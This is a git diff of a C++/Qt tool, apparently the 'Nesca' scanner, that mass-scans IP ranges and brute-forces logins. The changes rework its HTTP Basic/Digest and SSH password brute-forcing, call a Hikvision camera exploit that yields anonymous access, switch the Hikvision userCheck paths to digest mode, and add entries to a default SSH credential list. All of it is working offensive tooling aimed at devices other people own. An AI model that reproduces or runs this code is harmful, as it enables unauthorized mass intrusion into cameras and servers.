diff --git a/BasicAuth.cpp b/BasicAuth.cpp index d41fdb7..c713037 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -47,15 +47,19 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode return 0; } -lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::string *buff) { +lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) { string lpString; lopaStr lps = {"UNKNOWN", "", ""}; int passCounter = 0; int res = 0; - - int isDig = Utils::isDigest(buff); + + std::string buff; + Connector con; + Sleep(1000); + con.nConnect(ip, port, &buff); + int isDig = Utils::isDigest(&buff); if (isDig == -1) { - stt->doEmitionFoundData("No 401 detected - " + + stt->doEmitionFoundData("No 401 detected - " + QString(ip) + ":" + QString::number(port) + ""); strcpy(lps.login, ""); return lps; @@ -63,14 +67,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std:: else if (isDig == 1) { if (digestMode != true) { digestMode = true; - stt->doEmitionRedFoundData("Digest selector mismatch - " + + stt->doEmitionRedFoundData("Digest selector mismatch - " + QString(ip) + ":" + QString::number(port) + ""); } } else { if (digestMode != false) { digestMode = false; - stt->doEmitionRedFoundData("Digest selector mismatch - " + + stt->doEmitionRedFoundData("Digest selector mismatch - " + QString(ip) + ":" + QString::number(port) + ""); }; } @@ -78,9 +82,9 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std:: std::string buffer; if (commenceHikvisionEx1(ip, port, digestMode)) { - stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" + - QString(ip) + ":" + - QString::number(port) + ")"); + //stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" + + // QString(ip) + ":" + + // QString::number(port) + ")"); strcpy(lps.login, "anonymous"); strcpy(lps.pass, "\177\177\177\177\177\177"); return lps; @@ -124,14 +128,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std:: return lps; } -lopaStr BA::BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer) { +lopaStr BA::BALobby(const char *ip, const int port, bool digestMode) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); ++baCount; ++BrutingThrds; - const lopaStr &lps = BABrute(ip, port, digestMode, buffer); + const lopaStr &lps = BABrute(ip, port, digestMode); --BrutingThrds; return lps; diff --git a/BasicAuth.h b/BasicAuth.h index 44c52cb..5f40f1d 100644 --- a/BasicAuth.h +++ b/BasicAuth.h @@ -8,11 +8,11 @@ class BA { private: - static lopaStr BABrute(const char *ip, const int port, bool digestMode, const std::string *buffer); + static lopaStr BABrute(const char *ip, const int port, bool digestMode); public: static int checkOutput(const string *buffer, const char *ip, const int port); - static lopaStr BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer); + static lopaStr BALobby(const char *ip, const int port, bool digestMode); }; #endif // BASICAUTH_H diff --git a/Connector.cpp b/Connector.cpp index c937d45..c1e1eb3 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -161,11 +161,8 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); int proxyPort = std::atoi(gProxyPort); - if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) { - curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); - curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); - } - else curl_easy_setopt(curl, CURLOPT_PROXY, ""); + if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); @@ -200,8 +197,7 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, else res = curl_easy_perform(curl); int sz = buffer->size(); - if (res == CURLE_OK || - (port == 21 && sz > 0)) { + if (res == CURLE_OK || (port == 21 && sz > 0)) { if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); Activity += sz; diff --git a/SSHAuth.cpp b/SSHAuth.cpp index 29e2960..97c2256 100644 --- a/SSHAuth.cpp +++ b/SSHAuth.cpp @@ -4,7 +4,6 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) { CURL *curl = curl_easy_init(); - curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L); char hostStr[128] = {0}; ZeroMemory(hostStr, sizeof(hostStr)); strcpy(hostStr, user); @@ -14,6 +13,7 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) if (curl) { + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); curl_easy_setopt(curl, CURLOPT_URL, host); curl_easy_setopt(curl, CURLOPT_PORT, port); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); @@ -22,23 +22,18 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) { curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); - } else { - curl_easy_setopt(curl, CURLOPT_PROXY, ""); - } - curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); - curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut); + } else curl_easy_setopt(curl, CURLOPT_PROXY, ""); + curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, sshTimeout); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, sshTimeout); curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L); int res = curl_easy_perform(curl); - - socket_t sock; - curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock); - - if(res != CURLE_OK) { - curl_easy_cleanup(curl); - ++ssh; - return -2; - } + if (res != CURLE_OK) { + curl_easy_cleanup(curl); + return -2; + } + socket_t sock = -1; + res = curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock); if(sock != -1) { ssh_session ssh_session = ssh_new(); @@ -49,13 +44,14 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) return -1; }; + ssh_options_set(ssh_session, SSH_OPTIONS_HOST, hostStr); ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0); ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0); ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout); //Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700 res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock); - + res = ssh_connect(ssh_session); if (res != SSH_OK) //Offline @@ -88,22 +84,6 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) return 0; } -char _get_ssh_banner(const char *ip, int port) { - char recvBuff[256] = {0}; - std::string buffer; - Connector con; - con.nConnect(ip, port, &buffer); - - int sz = buffer.size(); - - if(sz != 0) - { - strncpy(recvBuff, buffer.c_str(), sz < 256 ? sz : 256); - }; - - return *recvBuff; -} - int check_ssh_pass(const char *user, const char *pass, const char *userPass, const char *host, int port, std::string *buffer, const char *banner) { @@ -166,24 +146,25 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner return -1; } -QString strIP; -QString strPort; int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); - const char &banner = _get_ssh_banner(ip, port); - if(strlen(&banner) > 0) + std::string sshBanner; + Connector con; + con.nConnect(ip, port, &sshBanner); + + if (strlen(sshBanner.c_str()) > 0) { - //BruteUtils::BConInc(); ++BrutingThrds; - int res = SSHBrute(ip, port, buffer, &banner); + int res = SSHBrute(ip, port, buffer, sshBanner.c_str()); --BrutingThrds; - //BruteUtils::BConDec(); + return res; - }; - return -1; - } else return -1; + } + } + + return -1; } diff --git a/finder.cpp b/finder.cpp index df79209..a5fc328 100644 --- a/finder.cpp +++ b/finder.cpp @@ -1227,13 +1227,12 @@ int _specBrute(const char *ip, int port, { const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(), port, - (strcmp(comment, "[DIGEST]") == 0 ? true : false), - buffer); + (strcmp(comment, "[DIGEST]") == 0 ? true : false)); if (strcmp(lps.other, "404") == 0) { stt->doEmitionRedFoundData("BA - 404 " + - QString(ip) + ":" + QString::number(port) + QString(path) + ""); + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + QString(path) + ""); return -1; } @@ -2512,8 +2511,8 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex } else if (flag == 34) //Hikvision ip cam { - if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "Basic Authorization", cp, size, buffcpy) == -1){ - _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "Basic Authorization", cp, size, buffcpy); + if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size, buffcpy) == -1){ + _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size, buffcpy); } } else if (flag == 35) //EasyCam @@ -2673,7 +2672,7 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex char log[512] = { 0 }; ++AnomC1; - const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false, buffcpy); + const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false); sprintf(log, "[HFS]:%s:%d T: %s Pass: %s:%s", ip, port, ip, port, finalstr, lps.login, lps.pass); diff --git a/negatives.txt b/negatives.txt index a468da0..ef429ed 100644 --- a/negatives.txt +++ b/negatives.txt @@ -1,3 +1,6 @@ +ssl vpn +Ref1=http +hello. goodbye. Analog Telephone Adapter IP Dect - AnyGate diff --git a/nesca_3.cpp b/nesca_3.cpp index bb74c19..8b5bb22 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -172,7 +172,7 @@ void _LoadPersInfoToLocalVars(int savedTabIndex) { gMode = 1; gThreads = ui->lineEditThread->text().toInt(); - strcpy(currentIP, ui->lineEditStartIPDNS->text().toLocal8Bit().data()); + strcpy(currentIP, ui->dnsLine->text().toLocal8Bit().data()); strcpy(gTLD, ui->lineILVL->text().toLocal8Bit().data()); strncpy(gPorts, ("-p" + ui->dnsPortLine->text()).toLocal8Bit().data(), 65536); gPorts[ui->dnsPortLine->text().length() + 2] = '\0'; @@ -536,7 +536,9 @@ void SetValidators() QRegExp("([\\d*|.|//|-])+"), NULL ); - + + ui->ipLine->setValidator(validator); + validator = new QRegExpValidator(QRegExp("\\d{1,3}"), NULL); ui->importThreads->setValidator(validator); ui->threadLine->setValidator(validator); @@ -551,7 +553,7 @@ void SetValidators() ui->threadDelayBox->setValidator(validator); validator = new QRegExpValidator(QRegExp("(\\w|-|\\.|\\[|\\]|\\\\)+"), NULL); - ui->lineEditStartIPDNS->setValidator(validator); + ui->dnsLine->setValidator(validator); validator = new QRegExpValidator(QRegExp("(\\w|-|\\.)+((\\w|-|\\.)+)+"), NULL); ui->lineILVL->setValidator(validator); @@ -1401,7 +1403,7 @@ void nesca_3::slotSaveImage(QAction *qwe) { QString fn = QString::number(QT.msec()) + "_" + (ME2ScanFlag ? QString("ME2") : QString("Voice")) + "_" + - (ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png"; + (ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png"; int ax = 27; int ay = 2; int w = ui->graphicLog->width() + 30; @@ -1444,7 +1446,7 @@ void nesca_3::slotSaveImage(QAction *qwe) { QString fn = QString::number(QT.msec()) + "_" + (PieStatFlag ? "PieStat" : "QoS") + "_" + - (ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png"; + (ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png"; QPixmap pixmap(ui->graphicLog->width(), ui->graphicLog->height()); QPainter painter(&pixmap); @@ -2094,14 +2096,15 @@ void nesca_3::ConnectEvrthng() connect ( ui->restoreDefaultPorts1, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) ); connect ( ui->restoreDefaultPorts2, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) ); connect ( ui->restoreDefaultPorts3, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) ); - connect ( ui->lineEditStartIPDNS, SIGNAL( textChanged(QString) ), this, SLOT( DNSLine_ValueChanged(QString) ) ); - connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); - connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); - connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); - connect ( ui->lineEditStartIPDNS, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); - connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); - connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); - connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->dnsLine, SIGNAL(textChanged(QString)), this, SLOT(DNSLine_ValueChanged(QString))); + + connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); + connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); + connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); + connect ( ui->dnsLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); connect ( ui->logoLabel, SIGNAL( clicked() ), this, SLOT( logoLabelClicked() ) ); connect ( ui->me2ScanBut, SIGNAL( clicked() ), this, SLOT( activateME2ScanScene() ) ); connect ( ui->QoSScanBut, SIGNAL( clicked() ), this, SLOT( activateQoSScanBut() ) ); @@ -2227,7 +2230,7 @@ void RestoreSession() qLex.replace("[az]", "\\l"); qLex.replace("[0z]", "\\w"); qLex.replace("[09]", "\\d"); - ui->lineEditStartIPDNS->setText(qLex); + ui->dnsLine->setText(qLex); lex = strtok(NULL, " "); if(strstr(lex, ".") != NULL) { strcpy(gTLD, lex); @@ -2722,18 +2725,18 @@ void nesca_3::IPScanSeq() void nesca_3::DNSScanSeq() { - if (ui->lineEditStartIPDNS->text() != "") + if (ui->dnsLine->text() != "") { if (ui->dnsPortLine->text() != "") { - if (ui->lineEditStartIPDNS->text().indexOf(".") > 0) + if (ui->dnsLine->text().indexOf(".") > 0) { stopFirst = false; ui->tabMainWidget->setTabEnabled(0, false); ui->tabMainWidget->setTabEnabled(2, false); - QStringList lst = ui->lineEditStartIPDNS->text().split("."); - ui->lineEditStartIPDNS->setText(lst[0]); + QStringList lst = ui->dnsLine->text().split("."); + ui->dnsLine->setText(lst[0]); QString topLevelDomainStr; for (int i = 1; i < lst.size(); ++i) { @@ -2746,7 +2749,7 @@ void nesca_3::DNSScanSeq() saveOptions(); stt->setMode(1); - stt->setTarget(ui->lineEditStartIPDNS->text()); + stt->setTarget(ui->dnsLine->text()); stt->setPorts(ui->dnsPortLine->text().replace(" ", "")); stt->start(); diff --git a/nesca_3.ui b/nesca_3.ui index 3d6d1c0..1710445 100644 --- a/nesca_3.ui +++ b/nesca_3.ui @@ -190,7 +190,7 @@ color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);border:none; - 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21 + 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21 4096 @@ -398,7 +398,7 @@ DNS Scan - + 110 @@ -501,7 +501,7 @@ color: rgb(216, 216, 216);background-color: rgb(56, 56, 56); - 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21 + 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21 4096 @@ -808,7 +808,7 @@ color: rgb(214, 214, 0); color: rgb(216, 216, 216);background-color: rgb(56, 56, 56); - 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21 + 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21 80,81,8080,8888,21,6667,7000 @@ -3320,7 +3320,7 @@ background-color: #000000; ipLine ipmPortLine threadLine - lineEditStartIPDNS + dnsLine lineILVL dnsPortLine lineEditThread diff --git a/sshpass.txt b/sshpass.txt index 1f5eb34..aac4d48 100644 --- a/sshpass.txt +++ b/sshpass.txt @@ -1,4 +1,5 @@ hw230f8034t:17932yhf823 +admin: root:root root:admin admin:admin diff --git a/version b/version index 5adfb60..18d0644 100644 --- a/version +++ b/version @@ -1 +1 @@ -24B9D-DD \ No newline at end of file +24B9E-852 \ No newline at end of file